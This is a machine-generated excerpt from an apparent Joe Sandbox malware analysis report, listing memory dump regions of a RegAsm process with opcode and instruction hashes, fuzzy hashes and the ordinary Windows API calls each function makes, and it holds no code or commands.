                          • Instruction ID: 7e5334917de8d037419ee581e725cc844f5212cbd0582c5501d55e7410613ca4
                          • Opcode Fuzzy Hash: 272fbb45e06eddc68ad9d3f6631489228f8d1777543bf3c87cc8094e0fb3d6c8
                          • Instruction Fuzzy Hash: A1D1BE74E0521DCFDB24CF69D989BADBBF2BB49300F1090AAD859A7251DB709E85CF00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2659e68308b06e7f31debe42b0367347b7f82006d225b2015c7f9512e53b2c9
                          • Instruction ID: 9bccfe3ec44cd1e73f93ef7375a235a20bccda62b07a1b8a3e81e967cba91112
                          • Opcode Fuzzy Hash: f2659e68308b06e7f31debe42b0367347b7f82006d225b2015c7f9512e53b2c9
                          • Instruction Fuzzy Hash: A4C15935E042588FCF15CFA5C984B9DBBF2BF89310F14C9AAD81AAB255DB30D984CB54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea31a1e41f2c0a63841961549fa3aa25158ad6082584d5e9366f6c4816755cdf
                          • Instruction ID: b99aaabed9571531a361e24f79a18b885354fd0fd4b9a866619451a8e0b8b937
                          • Opcode Fuzzy Hash: ea31a1e41f2c0a63841961549fa3aa25158ad6082584d5e9366f6c4816755cdf
                          • Instruction Fuzzy Hash: BAC18475E006198FDB68DF6AD9447DEBBF2BF89300F14C1AAD809A7265DB305A85CF40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c761b82659d94f2fe25f3f7890a2f3c9136017f00cebe45b94d636767b9120c
                          • Instruction ID: 6d95c6eece70ff19fb80c1cadb1a1f41187b19f6968a232800343a4e181e8b49
                          • Opcode Fuzzy Hash: 2c761b82659d94f2fe25f3f7890a2f3c9136017f00cebe45b94d636767b9120c
                          • Instruction Fuzzy Hash: 37A1E178D0421CCFDB24CFAAC848BADBBB6FF49300F1090AAD51AA7255DB745986CF11
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5fb9c1d1ec97b383bc98a83a44ed3fabba0c9b555c4b24566c3956efb11488d
                          • Instruction ID: c5ec50618d3e27627726eb444aa8fdafb99dd7789b8e70d42e0fa2e2ac1452fd
                          • Opcode Fuzzy Hash: c5fb9c1d1ec97b383bc98a83a44ed3fabba0c9b555c4b24566c3956efb11488d
                          • Instruction Fuzzy Hash: 77B16575E006198FDB68DF6AC9447DEBBF2BF89300F14C1AAD809A7265DB315A85CF40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c80cca6ed886587d843cc9b7c2265f7eef118a58802e5329b5b42520e7b89c3b
                          • Instruction ID: 45e342eceab5abd65eefdb10fb1663669633952ef5e80431d33aec19cea3afd1
                          • Opcode Fuzzy Hash: c80cca6ed886587d843cc9b7c2265f7eef118a58802e5329b5b42520e7b89c3b
                          • Instruction Fuzzy Hash: B3A1E078D0421CCFDB24CFAAD944BADBBF2BF49300F1090AAD51AA7255DB745986CF11
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dbbc1279eda544c284bf6a4d2d95931b5f07675ed352e16056eaad2cd76d86b7
                          • Instruction ID: 8690edf80e238928fc032687d3357b8de1a1d9bcc0516613e26de6191db7a67a
                          • Opcode Fuzzy Hash: dbbc1279eda544c284bf6a4d2d95931b5f07675ed352e16056eaad2cd76d86b7
                          • Instruction Fuzzy Hash: C4917870A04249CFDB49DF6AE85469ABFF2FF85300F04C16EC4159B2A9EF784846CB55

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 056C349E
                          • GetCurrentThread.KERNEL32 ref: 056C34DB
                          • GetCurrentProcess.KERNEL32 ref: 056C3518
                          • GetCurrentThreadId.KERNEL32 ref: 056C3571
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 445d84fecd113ee92b7265fff3ed739e122fd91d97ab40ffe269e9f13ab57b21
                          • Instruction ID: 09df9b5386aea9519f98d9d84948ea5026f3efc5971a1d57becaaa0900649523
                          • Opcode Fuzzy Hash: 445d84fecd113ee92b7265fff3ed739e122fd91d97ab40ffe269e9f13ab57b21
                          • Instruction Fuzzy Hash: ED5133B0A0074A8FDB54CFAAD548BAEBFF1EF88314F24C459E409A7350DB749944CB65

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 056C349E
                          • GetCurrentThread.KERNEL32 ref: 056C34DB
                          • GetCurrentProcess.KERNEL32 ref: 056C3518
                          • GetCurrentThreadId.KERNEL32 ref: 056C3571
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 7824aa8076d60b250b31ff50d57d97642275ce6dd77b5269da20540a684bacdd
                          • Instruction ID: 10a4cb35f1248d78e66617945bbde76e335e49b31bf928c3c893dcf80e49d68a
                          • Opcode Fuzzy Hash: 7824aa8076d60b250b31ff50d57d97642275ce6dd77b5269da20540a684bacdd
                          • Instruction Fuzzy Hash: 455145B090074A8FDB44CFA9D548BAEBFF1EB88314F20C49DD409A7350CB749944CB65
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 056C13DE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 10bee95a33dafe9a360e94bbcd5b5a27704d50a1836a17f6789f18e1dc2497df
                          • Instruction ID: f8cb06c45de60049b23d3094fc2b602ccd536ba4bd67708762314dc4174e9eef
                          • Opcode Fuzzy Hash: 10bee95a33dafe9a360e94bbcd5b5a27704d50a1836a17f6789f18e1dc2497df
                          • Instruction Fuzzy Hash: 97714374A00B058FDB24DF69D05476ABBF2FF89204F008A6DD45AD7B40DB78E845CB90
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056C7D02
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: 231af040e33b41c9365a6f4f63d985b8745def60b42f7243fedcce73d5d3f0bd
                          • Instruction ID: 7da33d234650a5c729236f6733a2b069f8358dda7645b3c4f7e06f6d5b99bea2
                          • Opcode Fuzzy Hash: 231af040e33b41c9365a6f4f63d985b8745def60b42f7243fedcce73d5d3f0bd
                          • Instruction Fuzzy Hash: D8419DB1D002499FDB14CF99C884AEEBFB5FF48310F24856EE819AB210D774A945CF90
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056C7D02
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: f9cd7c00e6bc656c25523f05bab26462cd4458e0e1c8aea39930ad5bae68c18a
                          • Instruction ID: d5a9eca9ad40dc27a8d6aba9b9361fcf11dc77609e70e3e7cf87637a1847678e
                          • Opcode Fuzzy Hash: f9cd7c00e6bc656c25523f05bab26462cd4458e0e1c8aea39930ad5bae68c18a
                          • Instruction Fuzzy Hash: B441FFB5D003499FDB14CFA9C880AEDBFB1EF48310F24955EE819AB250D775A945CF90
                          APIs
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 056CA281
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: CallProcWindow
                          • String ID:
                          • API String ID: 2714655100-0
                          • Opcode ID: 4c184f4f229f0782b810491df38a5c0d9577250754fc9d11cb73514c5fe7e680
                          • Instruction ID: 1fa1733d620eebe1d95c4a4908fae630c0808091d814ef8f135cfe824305cf1c
                          • Opcode Fuzzy Hash: 4c184f4f229f0782b810491df38a5c0d9577250754fc9d11cb73514c5fe7e680
                          • Instruction Fuzzy Hash: 144119B5A00319CFDB14CF99C448AAABFF5FF88314F28849DE519A7321D775A841CBA0
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 0145BFD1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 9b561849df6e3a0f416ffc69a5b64eb8d0851689bd098ddc5f4766b0f32a3276
                          • Instruction ID: 508844aa04434cf146642537534c81f24fa50b6fdfb065f711ebd41302bbdc78
                          • Opcode Fuzzy Hash: 9b561849df6e3a0f416ffc69a5b64eb8d0851689bd098ddc5f4766b0f32a3276
                          • Instruction Fuzzy Hash: 5C41DFB1C0071DCBDB64CFA9C984B9EBBB5BF49704F20806AD908BB251DBB56945CF90
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 0145BFD1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 85feefe25cd3b2e45c989d5517e1e3106ed989d7ab3d7baf7126e1cbabe4e3ee
                          • Instruction ID: 703c6de868a730572d5ca562a8106c00668ac63e9b738a303ac08c53ba693148
                          • Opcode Fuzzy Hash: 85feefe25cd3b2e45c989d5517e1e3106ed989d7ab3d7baf7126e1cbabe4e3ee
                          • Instruction Fuzzy Hash: 1E41DFB1C0071DCBEB24CFA9C984B9EBBB5BF49704F20806AD408AB251DBB56945CF90
                          APIs
                          • SendMessageW.USER32(?,?,?,?), ref: 05A1427D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 7e911d24c3e12de0b3309e57f70e48f19f7c3fd2a926fbdb5b42129e716548ce
                          • Instruction ID: 8aa9af26ee7cc9ceb96a256a116795600dca856a9538144154417e4a2b9be7c9
                          • Opcode Fuzzy Hash: 7e911d24c3e12de0b3309e57f70e48f19f7c3fd2a926fbdb5b42129e716548ce
                          • Instruction Fuzzy Hash: 082137B59043099FCB10CFA9C545B9EBBF4FF48320F10845AE919A7650D774A984CBA5
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 056C36EF
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 0c5f33e191340bb6405636780a96316d994d1415ba8d5677e8211223e1cfd681
                          • Instruction ID: 27cb37b0c18af5801c5525e5137a71824ea7aa23cf6c05209d45a319572c2f1a
                          • Opcode Fuzzy Hash: 0c5f33e191340bb6405636780a96316d994d1415ba8d5677e8211223e1cfd681
                          • Instruction Fuzzy Hash: 0521C4B59002499FDB10CF9AD984ADEBFF4FB48720F14845AE914A3310D378A954CFA5
                          APIs
                          • GetClassInfoW.USER32(?,00000000), ref: 05A14D0C
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: ClassInfo
                          • String ID:
                          • API String ID: 3534257612-0
                          • Opcode ID: 8a6f294ca86f8cccabe33daa634cb5463a0aa4b8ab292c7c3ccffd31c82ce9fa
                          • Instruction ID: 6eba3bef04d97e6dc44d62337aff71a7b5f91bcf78f9557c0c1b688e9b2b7341
                          • Opcode Fuzzy Hash: 8a6f294ca86f8cccabe33daa634cb5463a0aa4b8ab292c7c3ccffd31c82ce9fa
                          • Instruction Fuzzy Hash: 6B2104B690174A8FDF10CF9AC984BDEFBF4BF48320F14842AD919A3240D378A544CB65
                          APIs
                          • GetClassInfoW.USER32(?,00000000), ref: 05A14D0C
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: ClassInfo
                          • String ID:
                          • API String ID: 3534257612-0
                          • Opcode ID: 92ae5c970f29fcd8cd5b724562c61dbe8874b2364d6ee9ba4ac84f45c941eed4
                          • Instruction ID: c02f46a877fa979db46320bbfd10557b385c6e6cb5f0fe7e18fa269f9798df21
                          • Opcode Fuzzy Hash: 92ae5c970f29fcd8cd5b724562c61dbe8874b2364d6ee9ba4ac84f45c941eed4
                          • Instruction Fuzzy Hash: 812115B69017098FDF10CF9AC884BDEFBF4FB48320F14842AE919A3200D378A944CB65
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 056C36EF
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: da185b278fc3317106ae0ed5f2595c3c4c6d4282ace69c663b7b1a36f6f7edab
                          • Instruction ID: c036dd09037a1e0b868c8637ef30c3b9da1389756d3116d7eab568c9a8ae5210
                          • Opcode Fuzzy Hash: da185b278fc3317106ae0ed5f2595c3c4c6d4282ace69c663b7b1a36f6f7edab
                          • Instruction Fuzzy Hash: 562125B5900249DFDB00CF99D580ADEBFF4FB48320F14855AE914A7350D378AA50CF61
                          APIs
                          • SetWindowTextW.USER32(?,00000000), ref: 05A11402
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          • Opcode ID: fa73729a0bd1ca61e38917072217993f7575456d2e15f8f20c99238c0f648a94
                          • Instruction ID: b50159e23eeda7d1d279665b74dad8f7cd19205b6765dc255dfe52e0a6e3746a
                          • Opcode Fuzzy Hash: fa73729a0bd1ca61e38917072217993f7575456d2e15f8f20c99238c0f648a94
                          • Instruction Fuzzy Hash: 222136B6C006498FDB10CF9AC444BDEFBF4EB48720F14842AE929A7200D778A545CFA5
                          APIs
                          • SetWindowTextW.USER32(?,00000000), ref: 05A11402
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          • Opcode ID: 305fb84742ebd9cec2b5fdef7ae040104544ae5c086775c00d49d5857aafc7af
                          • Instruction ID: d7589cd531e414f7456fadd238a757ca7b225a074a19a9a8854a661b7f634b09
                          • Opcode Fuzzy Hash: 305fb84742ebd9cec2b5fdef7ae040104544ae5c086775c00d49d5857aafc7af
                          • Instruction Fuzzy Hash: 781114B68006498FDB10CF9AC444BDEFBF4EB88720F14842AD969A3600D778A545CFA5
                          APIs
                          • GetConsoleWindow.KERNELBASE ref: 05A7347F
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID: ConsoleWindow
                          • String ID:
                          • API String ID: 2863861424-0
                          • Opcode ID: 5531620b60d537cae9d7220abc9ab73441d3b1c365f0a95f4e5bc1ac547da33c
                          • Instruction ID: d16d96095692f896376fa2f1fbd9bd4f602670d4a26ad442aec936007d88e3d0
                          • Opcode Fuzzy Hash: 5531620b60d537cae9d7220abc9ab73441d3b1c365f0a95f4e5bc1ac547da33c
                          • Instruction Fuzzy Hash: CD1136B5D0034A8FDB14DFA9C9457DEBBF0AF48724F24881AC519B7240DB78A544CB95
                          APIs
                          • GetConsoleWindow.KERNELBASE ref: 05A7347F
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID: ConsoleWindow
                          • String ID:
                          • API String ID: 2863861424-0
                          • Opcode ID: 154b7193f8620fb4385b253be2e7729774210b60ef6bd4987dc38a48807fcb41
                          • Instruction ID: 97f57318df65120bd530175e864f5c0955923a819a4ac84f050647ecb118cc24
                          • Opcode Fuzzy Hash: 154b7193f8620fb4385b253be2e7729774210b60ef6bd4987dc38a48807fcb41
                          • Instruction Fuzzy Hash: DB1136B1D003498FDB24DFAAC8457DEBBF4AF88724F24881AC519A7240DB79A544CBA5
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 056C13DE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: cab2d52e4526e18080216c5b4525ef03950c881d221b4715f8808dd8dae241e9
                          • Instruction ID: b559b72b5fe2c37b75cde82c0f6e6df3e32dffda9d40b2a9df952634e485f282
                          • Opcode Fuzzy Hash: cab2d52e4526e18080216c5b4525ef03950c881d221b4715f8808dd8dae241e9
                          • Instruction Fuzzy Hash: 28110FB6C007498FCB10CF9AC444BDEFBF4EF88624F10845AD829A7600D3B8A545CFA1
                          APIs
                          • SetWindowLongW.USER32(?,?,?), ref: 056C7E95
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID:
                          • API String ID: 1378638983-0
                          • Opcode ID: e062c5f0297deac0a177dc82aa457adbbe76b6d634c1f66fe69f51e12d11548b
                          • Instruction ID: f77e6f8bdfd0d52c47289376fd3bfd271c00667c87c19afcf90bba3d68fa41ff
                          • Opcode Fuzzy Hash: e062c5f0297deac0a177dc82aa457adbbe76b6d634c1f66fe69f51e12d11548b
                          • Instruction Fuzzy Hash: 1D1106B68003499FDB10CF9AD585BDEBFF8EB48724F148459D915A3700D3B8A944CFA5
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 05A12A75
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: ad7d2857aa439a8ba0877914c3a8196a9e52b291a2a72ec6f1a59b11bd3916a8
                          • Instruction ID: 6410edddd5ba32db0f737e52c816a9348152cf099eca5b307c8dcabdce4cd804
                          • Opcode Fuzzy Hash: ad7d2857aa439a8ba0877914c3a8196a9e52b291a2a72ec6f1a59b11bd3916a8
                          • Instruction Fuzzy Hash: 7C1106B58003499FDB10CF9AD945BDEBFF4EB48724F108419D914A3600D3B5A544CFA5
                          APIs
                          • SetWindowLongW.USER32(?,?,?), ref: 056C7E95
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID:
                          • API String ID: 1378638983-0
                          • Opcode ID: d39761514e99d72d4608ee01760bf78672218b00ee8bcbc43b293cbf16713554
                          • Instruction ID: 57c4801e408da8bad1b601812438524f82c96e311d5c862e5c0384505749128f
                          • Opcode Fuzzy Hash: d39761514e99d72d4608ee01760bf78672218b00ee8bcbc43b293cbf16713554
                          • Instruction Fuzzy Hash: 6611D3B68002499FDB10CF9AD585BDEBFF8EB48724F20845AD919A7700D3B4A944CFA5
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 05A12A75
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 7a65caf9b4f8f331781d61968bc71ad48d68b8c176651e70606f13c1322d4bb4
                          • Instruction ID: e027c3b4cce4f926cb900df2582f668595c229858803455bc33c8176634810b1
                          • Opcode Fuzzy Hash: 7a65caf9b4f8f331781d61968bc71ad48d68b8c176651e70606f13c1322d4bb4
                          • Instruction Fuzzy Hash: FF1103B58003499FDB10CF9AD944BDEBFF8EB48724F108819D918A3200D3B9A544CFA5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215283340.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13ed000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ecf4d4057e8a367da63bbbfee35a8d12d4a0f14b31562668010d0e47913f6f2
                          • Instruction ID: bb5643a097c37c292cafaa3c08389730ee583418d25df91be22e0100e4008afb
                          • Opcode Fuzzy Hash: 1ecf4d4057e8a367da63bbbfee35a8d12d4a0f14b31562668010d0e47913f6f2
                          • Instruction Fuzzy Hash: 9C214572500348DFDB05CF84D9C8B26BFA5FB8832CF20816DD9090B2D6C336D856CAA2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215283340.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13ed000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ada152feaba1ac20e94e39c33646b16e11bafce930e4ab3df5f5e17956d33d8
                          • Instruction ID: 5e3734ee899b183863e80ba7429d2c785061320e8244c4167d4111ce0811b7f6
                          • Opcode Fuzzy Hash: 3ada152feaba1ac20e94e39c33646b16e11bafce930e4ab3df5f5e17956d33d8
                          • Instruction Fuzzy Hash: 33217872104304EFDB05DF44D9C4B66BFA5FBA4328F20C56CD9091B682C736E406CEA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215419083.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13fd000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90f2bfa9c5b658a0fac06220855a1c4bb7e6776701c07a92ab6f00616305afec
                          • Instruction ID: 16d71dc69823a32098edbb5e9853a4fec0fd7a7eb40d4820c5eda43887909b8e
                          • Opcode Fuzzy Hash: 90f2bfa9c5b658a0fac06220855a1c4bb7e6776701c07a92ab6f00616305afec
                          • Instruction Fuzzy Hash: 49214271204204EFDB15DF54D9C8B26BB65FB84318F20C56DDA0A4B342C73AC407CA61
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215419083.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13fd000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 789c4f2313c165674fff23a9b2fe416d53183f11d700c574eb431de0ff6d26fa
                          • Instruction ID: 0159c0bed3572ca7c9cb5c70481a5f8ef172feb900afa6097ae3cc8a9f4625f8
                          • Opcode Fuzzy Hash: 789c4f2313c165674fff23a9b2fe416d53183f11d700c574eb431de0ff6d26fa
                          • Instruction Fuzzy Hash: A4214679504304FFDB05DF94DAC8B26BBA5FB84328F20C56DDA094B252C77AD446CAA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215419083.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13fd000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebdb38f55d17435b6f57bddf9c32f1ac439411e12d2378d63242cf7272f2746d
                          • Instruction ID: 07dcf0f2f4b606dd11a207a75eb3c34e18443cc266be890e160d5f17c161ab15
                          • Opcode Fuzzy Hash: ebdb38f55d17435b6f57bddf9c32f1ac439411e12d2378d63242cf7272f2746d
                          • Instruction Fuzzy Hash: AB218E755093808FCB03CF24D994715BF71EB46218F28C5EAD9498F667C33A980ACB62
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215283340.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13ed000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a5504dfd99aeaae02a5904faf24bf7c180eb56da23d91347c8bcbb22ee6d9b3
                          • Instruction ID: 3eaa804c40d3ca973fb9fcbdc00106d6750d21434766bce125a3b836aa8c35bd
                          • Opcode Fuzzy Hash: 5a5504dfd99aeaae02a5904faf24bf7c180eb56da23d91347c8bcbb22ee6d9b3
